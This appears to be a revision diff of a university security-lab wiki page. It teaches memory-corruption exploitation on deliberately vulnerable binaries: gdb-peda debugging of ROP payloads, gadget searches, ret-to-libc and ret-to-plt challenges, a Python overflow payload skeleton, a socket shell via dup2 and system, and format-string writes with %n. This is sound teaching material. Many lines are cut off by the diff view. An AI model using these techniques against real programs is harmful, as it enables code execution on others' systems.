- | > | + | |
- | >end | + | |
- | + | ||
- | + | ||
- | gdb-peda$ run | + | |
- | Starting program: | + | |
- | warning: the debug information found in "/ | + | |
- | + | ||
- | warning: Could not load shared library symbols for linux-gate.so.1. | + | |
- | Do you need "set solib-search-path" | + | |
- | + | ||
- | Breakpoint 4, 0x08048330 in __libc_start_main@plt () | + | |
- | + | ||
- | Breakpoint 8, 0x08048470 in __libc_csu_init | + | |
- | + | ||
- | Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () | + | |
- | + | ||
- | Breakpoint 1, 0x080482d4 in _init () | + | |
- | + | ||
- | Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () | + | |
- | + | ||
- | Breakpoint 7, 0x0804843f in main () | + | |
- | + | ||
- | Breakpoint 2, 0x08048310 in read@plt () | + | |
- | + | ||
- | AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7 | + | |
- | + | ||
- | Program received signal SIGSEGV, Segmentation fault. | + | |
- | 0x41414541 in ?? () | + | |
</ | </ | ||
+ | Now a format string of “%97u” would increase the ' | ||
+ | The final check if the padding is below ten deserves some attention. A simple integer output, such as " | ||
+ | If the required length is larger than the padding we specify, say we want to output ' | ||
+ | By ensuring our padding is always larger than 10, we can keep an always accurate number of ‘already_written’, | ||
- | ==== ROP payload debugging | + | ==== A general method to exploit format strings vulnerabilities ==== |
- | When you know what the offending function is, disassemble it and break on " | + | The only remaining thing to exploit such vulnerabilities in a hands-on practical way is to put the arguments into the right order on the stack and use a stackpop sequence to increase the stack pointer. |
- | <code bash> | + | It should look like: |
- | gdb-peda$ pdis main | + | < |
- | Dump of assembler code for function main: | + | <stackpop><dummy-addr-pair * 4><write-code> |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | End of assembler dump. | + | |
- | gdb-peda$ b *0x08048467 | + | |
- | Breakpoint 1 at 0x8048467 | + | |
- | + | ||
- | + | ||
- | AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA | + | |
- | [----------------------------------registers-----------------------------------] | + | |
- | EAX: 0x0 | + | |
- | EBX: 0xf7f97e54 --> 0x1a6d5c | + | |
- | ECX: 0xffffcd49 (" | + | |
- | EDX: 0x64 (' | + | |
- | ESI: 0x0 | + | |
- | EDI: 0x0 | + | |
- | EBP: 0x41334141 (' | + | |
- | ESP: 0xffffcd6c (" | + | |
- | EIP: 0x8048467 (<main+43>: | + | |
- | EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow) | + | |
- | [-------------------------------------code-------------------------------------] | + | |
- | | + | |
- | 0x804844d | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | => 0x8048467 < | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | [------------------------------------stack-------------------------------------] | + | |
- | 0000| 0xffffcd6c | + | |
- | 0004| 0xffffcd70 --> 0x80484cf (< | + | |
- | 0008| 0xffffcd74 --> 0xf7f56be6 ("/ | + | |
- | 0012| 0xffffcd78 --> 0xf7e25c00 (< | + | |
- | + | ||
- | + | ||
- | gdb-peda$ patto AEAAeAA4AAFAAfA | + | |
- | AEAAeAA4AAFAAfA found at offset: 35 | + | |
</ | </ | ||
+ | Where: | ||
+ | * **stackpop** The sequence of stack popping parameters that increase the stack pointer. Once the stackpop has been processed, the format function internal stack pointer points to the beginning of the dummy-addr-pair strings. | ||
+ | * **dummy-addr-pair** Four pairs of dummy integer values and addresses to write to. The addresses are increasing by one with each pair, the dummy integer value can be anything that does not contain NULL bytes. | ||
+ | * **write-code** The part of the format string that actually does the writing to the memory, by using ' | ||
- | Then you can break on all called functions or step as needed | + | The write code has to be modified |
- | + | ==== Direct Parameter Access ==== | |
- | + | There is a huge simplification which is known as ' | |
- | ==== checksec | + | method to format string exploitation. |
- | <code bash> | + | The direct parameter access is controlled by the '$' qualifier: |
- | gdb-peda$ checksec | + | <code C> |
- | CANARY | + | printf (" |
- | FORTIFY | + | |
- | NX : ENABLED | + | |
- | PIE : disabled | + | |
- | RELRO : Partial | + | |
</ | </ | ||
+ | Prints ' | ||
- | ==== gadget finding in peda | + | < |
- | Apart from **objdump** which only finds aligned instructions, | + | char foo[4]; |
- | < | + | printf (" |
- | gdb-peda$ start | + | " |
- | .... | + | " |
- | gdb-peda$ dumprop | + | " |
- | Warning: this can be very slow, do not run for large memory range | + | |
- | Writing ROP gadgets to file: a-rop.txt ... | + | (int *) &foo[0], (int *) &foo[1], |
- | 0x8048467: ret | + | (int *) &foo[2], (int *) &foo[3]); |
- | 0x804835d: iret | + | |
- | 0x804838f: repz ret | + | |
- | 0x80483be: ret 0xeac1 | + | |
- | 0x80483a9: leave; ret | + | |
- | 0x80485b4: inc ecx; ret | + | |
- | 0x80484cf: pop ebp; ret | + | |
- | 0x80482f5: pop ebx; ret | + | |
- | 0x80484df: nop; repz ret | + | |
- | 0x80483a8: ror cl,1; ret | + | |
- | 0x804838e: add dh,bl; ret | + | |
- | 0x80483e5: ror cl,cl; ret | + | |
- | 0x8048465: add cl,cl; ret | + | |
- | 0x804840b: leave; repz ret | + | |
- | 0x8048371: sbb al,0x24; ret | + | |
- | 0x80485b3: adc al,0x41; ret | + | |
- | 0x8048370: mov ebx,[esp]; ret | + | |
- | 0x80484de: nop; nop; repz ret | + | |
- | 0x80483a7: call eax; leave; ret | + | |
- | 0x80483e4: call edx; leave; ret | + | |
- | 0x804840a: add ecx,ecx; repz ret | + | |
- | 0x80484ce: pop edi; pop ebp; ret | + | |
</ | </ | ||
- | Something finer is: | ||
- | <code bash> | ||
- | gdb-peda$ asmsearch "pop ? ; ret" | ||
- | 0x080482f5 : (5bc3) pop | ||
- | 0x080484cf : (5dc3) pop | ||
- | 0x080484f6 : (5bc3) pop | ||
- | gdb-peda$ asmsearch "pop ? ; pop ? ; ret" | + | ==== Generalizing format string exploits ==== |
- | 0x080484ce | + | The '' |
+ | In general, any system where user input affects program execution and data access in a custom way can be susceptible to such a vulnerability. Other specialized examples can be considered: | ||
+ | * SQL injections | ||
+ | * XSS injections | ||
+ | ===== Tasks ===== | ||
- | gdb-peda$ asmsearch "call ?" | + | ==== Stack Canaries ==== |
- | 0x080483a7 : (ffd0) call | + | |
- | 0x080483e4 : (ffd2) call | + | |
- | 0x0804842f : (ffd0) call | + | |
- | </ | + | Download the archive with the tasks at the top of the page. The binaries should be fairly easy to reverse engineer. You can use any tool. |
- | ==== Anti-anti-debugging and others | + | === Task 1 === |
- | There can be various annoyances in binaries: **ptrace** calls for anti-debugging, | + | |
- | These can all be deactivated using **unptrace** (for ptrace) and **deactive** in peda. | + | |
+ | The '' | ||
+ | === Task 2 === | ||
- | == Challenges | + | The '' |
- | === 01. Challenge - ret-to-libc | + | <note warning> |
+ | You need to use the 32 bit VM to solve the second part of this task. | ||
+ | </ | ||
- | Looks good! Let's get serious and do something useful with this. | + | <note warning> |
+ | '' | ||
+ | </ | ||
- | Continue working in the '' | + | <note tip>In case you need some help on these, please take a look at the {{:session: |
- | The final goal of this task is to bypass the NX stack protection and call '' | ||
- | | + | ==== Task 3 - Format Strings ==== |
- | - Return to '' | + | Download the archive |
- | - Find the offset | + | |
- | - Make the binary | + | |
- | - **(bonus)** The process should '' | + | |
- | - Remember how we had ASLR disabled? The other '' | + | |
- | - Where is '' | + | |
<note important> | <note important> | ||
- | //Hint//: Use '' | + | The difficulty of the task associated with each binary increases with the number of the binary. |
</ | </ | ||
- | + | < | |
- | < | + | shows you the invalid address associated |
- | //Hint//: When you will finally attack this, '' | + | |
</ | </ | ||
- | === 02. Challenge - no-ret-control | ||
- | |||
- | Go to the '' | ||
- | |||
- | Imagine this scenario: we have an executable where we can change at least 4B of random memory, but ASLR is turned on. We cannot reliably change the value of the return address because of this. Sometimes ret is not even called at the end of a function. | ||
- | |||
- | Alter the execution of '' | ||
- | |||
- | === 03. Challenge - ret-to-plt | ||
- | |||
- | Go to the '' | ||
- | |||
- | '' | ||
- | |||
- | Your task is to build an exploit that makes the application always print the **same second random number**. That is the first printed random number is whatever, but the second printed random number will always be the same, for all runs. In the sample output below the second printed random number is always '' | ||
- | |||
- | <code text> | ||
- | hari@solyaris-home: | ||
- | Hi! Options: | ||
- | 1. Get random number | ||
- | 2. Go outside | ||
- | Here's a random number: 2070249950. Have fun with it! | ||
- | Hi! Options: | ||
- | 1. Get random number | ||
- | 2. Go outside | ||
- | Here's a random number: 1023098942. Have fun with it! | ||
- | Segmentation fault (core dumped) | ||
- | hari@solyaris-home: | ||
- | Hi! Options: | ||
- | 1. Get random number | ||
- | 2. Go outside | ||
- | Here's a random number: 1152946153. Have fun with it! | ||
- | Hi! Options: | ||
- | 1. Get random number | ||
- | 2. Go outside | ||
- | Here's a random number: 1023098942. Have fun with it! | ||
- | |||
- | </ | ||
- | | ||
- | You can use this Python skeleton for buffer overflow input: | ||
- | |||
- | <file python skel.py> | ||
- | # | ||
- | import struct, sys | ||
- | |||
- | def dw(i): | ||
- | return struct.pack("< | ||
- | |||
- | #TODO update count for your prog | ||
- | pad_count_to_ret = 100 | ||
- | payload = " | ||
- | |||
- | #TODO figure out where to return | ||
- | ret_addr = 0xdeadbeef | ||
- | payload += dw(ret_addr) | ||
- | |||
- | |||
- | #TODO add stuff after the payload if you need to | ||
- | payload += "" | ||
- | |||
- | sys.stdout.write(payload) | ||
- | </ | ||
- | |||
- | **Bonus**: The process should SEGFAULT after printing the second (constant) number. Make it exit cleanly (the exit code does not matter, just no SIGSEGV). | ||
- | |||
- | |||
- | === 04. Challenge - Gadget tutorial | ||
- | |||
- | This task requires you to construct a payload using gadgets and calling the functions inside such that it will print | ||
- | < | ||
- | Hello! | ||
- | stage A!stage B! | ||
- | </ | ||
- | Make it also print the messages in reverse order: | ||
- | < | ||
- | Hello! | ||
- | stage B!stage A! | ||
- | </ | ||
- | === 2. Bonus Challenge - Echo service | ||
- | This task is a network service that can be exploited. Run it locally and try to exploit it. You'll find that if you call system("/ | ||
- | |||
- | So you will need to do the equivalent of the following in a ROP chain: | ||
- | <code c> | ||
- | dup2(sockfd, | ||
- | dup2(sockfd, | ||
- | system("/ | ||
- | </ | ||
- | |||
- | |||
- | Exploit it first with ASLR disabled and then enabled. |